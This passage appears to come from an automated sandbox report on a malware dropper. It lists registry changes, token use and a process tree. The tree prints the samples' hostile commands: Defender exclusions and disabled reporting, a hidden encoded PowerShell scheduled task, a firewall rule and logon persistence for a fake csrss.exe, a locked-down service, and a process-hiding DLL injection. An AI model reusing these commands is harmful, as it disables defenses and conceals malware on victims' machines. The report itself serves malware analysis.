| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-771 = "Montevideo Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-622 = "Korea Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" | C:\Windows\windefender.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\qZ9asIxVFfIkyr7tC6Yn_R5F.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Users\Admin\Documents\GuardFox\6cYGcvtFY0A7rKnVNki2dVX9.exe
"C:\Users\Admin\Documents\GuardFox\6cYGcvtFY0A7rKnVNki2dVX9.exe"
C:\Users\Admin\Documents\GuardFox\qZ9asIxVFfIkyr7tC6Yn_R5F.exe
"C:\Users\Admin\Documents\GuardFox\qZ9asIxVFfIkyr7tC6Yn_R5F.exe"
C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe
"C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 740
C:\Users\Admin\AppData\Local\DiskEject\diskeject.exe
"C:\Users\Admin\AppData\Local\DiskEject\diskeject.exe" -s
C:\Users\Admin\AppData\Local\Temp\7zS2287.tmp\Install.exe
.\Install.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6136 -ip 6136
C:\Users\Admin\AppData\Local\DiskEject\diskeject.exe
"C:\Users\Admin\AppData\Local\DiskEject\diskeject.exe" -i
C:\Users\Admin\Documents\GuardFox\jYzDAQCRgQcFlUS0Eht2jUs4.exe
"C:\Users\Admin\Documents\GuardFox\jYzDAQCRgQcFlUS0Eht2jUs4.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\20a602ac-9a15-469a-80a0-9976fcd0a949" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6136 -ip 6136
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 748
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Users\Admin\AppData\Local\Temp\7zS35FF.tmp\Install.exe
.\Install.exe /NENsddidexHOV "525403" /S
C:\Users\Admin\Documents\GuardFox\VKg9wMRADoHWiTNa8Hgl9Zp5.exe
"C:\Users\Admin\Documents\GuardFox\VKg9wMRADoHWiTNa8Hgl9Zp5.exe"
C:\Users\Admin\Documents\GuardFox\Jhv610CCO7ohTiXzS8CCeWKd.exe
"C:\Users\Admin\Documents\GuardFox\Jhv610CCO7ohTiXzS8CCeWKd.exe"
C:\Users\Admin\Documents\GuardFox\Ew0D6wCwNOM8qo1gbXAuFx0N.exe
"C:\Users\Admin\Documents\GuardFox\Ew0D6wCwNOM8qo1gbXAuFx0N.exe"
C:\Users\Admin\Documents\GuardFox\OBUsg_TT5INyXWrn2bwJe6rY.exe
"C:\Users\Admin\Documents\GuardFox\OBUsg_TT5INyXWrn2bwJe6rY.exe"
C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe
"C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe"
C:\Users\Admin\Documents\GuardFox\mED2ejJwDnRZPqJENs6ntTPv.exe
"C:\Users\Admin\Documents\GuardFox\mED2ejJwDnRZPqJENs6ntTPv.exe"
C:\Users\Admin\Documents\GuardFox\0Q8uyAZHlmlFjtnqMRSKNaWR.exe
"C:\Users\Admin\Documents\GuardFox\0Q8uyAZHlmlFjtnqMRSKNaWR.exe"
C:\Users\Admin\Documents\GuardFox\s0le_fm_4gWqZWQK2MkxHiM0.exe
"C:\Users\Admin\Documents\GuardFox\s0le_fm_4gWqZWQK2MkxHiM0.exe"
C:\Users\Admin\Documents\GuardFox\gJn_RF5KcsYNA2OkQkJ29HHO.exe
"C:\Users\Admin\Documents\GuardFox\gJn_RF5KcsYNA2OkQkJ29HHO.exe"
C:\Users\Admin\AppData\Local\Temp\is-HBHE5.tmp\BfE8yx2fkiu6S97L10r7DVbH.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HBHE5.tmp\BfE8yx2fkiu6S97L10r7DVbH.tmp" /SL5="$501D2,3944858,54272,C:\Users\Admin\Documents\GuardFox\BfE8yx2fkiu6S97L10r7DVbH.exe"
C:\Users\Admin\Documents\GuardFox\ISlHKqSr3Ihf7Rtx6NjnELJr.exe
"C:\Users\Admin\Documents\GuardFox\ISlHKqSr3Ihf7Rtx6NjnELJr.exe"
C:\Users\Admin\Documents\GuardFox\BfE8yx2fkiu6S97L10r7DVbH.exe
"C:\Users\Admin\Documents\GuardFox\BfE8yx2fkiu6S97L10r7DVbH.exe"
C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe
"C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe"
C:\Users\Admin\Documents\GuardFox\F0_VOT2nFJ6jwNcBGGlSS5B4.exe
"C:\Users\Admin\Documents\GuardFox\F0_VOT2nFJ6jwNcBGGlSS5B4.exe"
C:\Users\Admin\Documents\GuardFox\IvrwUANQHwafTYHqZyTWOH2T.exe
"C:\Users\Admin\Documents\GuardFox\IvrwUANQHwafTYHqZyTWOH2T.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6136 -ip 6136
C:\Users\Admin\Documents\GuardFox\xUQkYU62TJdbos0qqRtjjjOA.exe
"C:\Users\Admin\Documents\GuardFox\xUQkYU62TJdbos0qqRtjjjOA.exe"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 792
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6136 -ip 6136
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 800
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gmbUZMUDx" /SC once /ST 17:55:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa86459758,0x7ffa86459768,0x7ffa86459778
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6136 -ip 6136
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 960
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gmbUZMUDx"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5292 -ip 5292
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 580
C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe
"C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6136 -ip 6136
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 992
C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe
"C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2504 -ip 2504
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 568
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1640 --field-trial-handle=1892,i,16076405160452306723,1768511441683282804,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1892,i,16076405160452306723,1768511441683282804,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 --field-trial-handle=1892,i,16076405160452306723,1768511441683282804,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3208 --field-trial-handle=1892,i,16076405160452306723,1768511441683282804,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3248 --field-trial-handle=1892,i,16076405160452306723,1768511441683282804,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4648 --field-trial-handle=1892,i,16076405160452306723,1768511441683282804,131072 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6136 -ip 6136
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 1344
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "6cYGcvtFY0A7rKnVNki2dVX9.exe" /f & erase "C:\Users\Admin\Documents\GuardFox\6cYGcvtFY0A7rKnVNki2dVX9.exe" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 6136 -ip 6136
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 1240
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "6cYGcvtFY0A7rKnVNki2dVX9.exe" /f
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 6076 -ip 6076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6076 -s 2364
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe
"C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gmbUZMUDx"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bbdcCALunqMygiEmYm" /SC once /ST 22:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\kMzhLfoTcrKrxiyap\MezcLIfZgZTsssG\BRbsIag.exe\" QS /xnsite_idZua 525403 /S" /V1 /F
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Users\Admin\AppData\Local\Temp\kMzhLfoTcrKrxiyap\MezcLIfZgZTsssG\BRbsIag.exe
C:\Users\Admin\AppData\Local\Temp\kMzhLfoTcrKrxiyap\MezcLIfZgZTsssG\BRbsIag.exe QS /xnsite_idZua 525403 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
